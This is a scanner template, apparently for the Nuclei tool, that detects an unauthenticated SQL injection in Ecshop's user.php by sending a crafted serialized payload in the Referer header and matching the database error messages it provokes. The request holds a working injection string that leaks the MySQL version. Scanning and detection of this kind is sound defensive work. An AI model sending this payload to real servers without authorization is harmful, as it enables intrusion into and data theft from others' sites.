id: ecshop-sqli

info:
  name: Ecshop SQLi
  author: Lark-lab,ImNightmaree
  severity: high
  description: A vulnerability in Ecshop allows remote unauthenticated users to inject arbitrary SQL statements into via the 'Referer' header field.
  reference:
    - https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
    - https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
  tags: sqli,php,ecshop

requests:
  - raw:
      - |
        GET /user.php?act=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}

    matchers:
      - type: word
        words:
          - 'XPATH syntax error:'
          - '[error] =>'
          - '[0] => Array'
          - 'MySQL server error report:Array'
        condition: and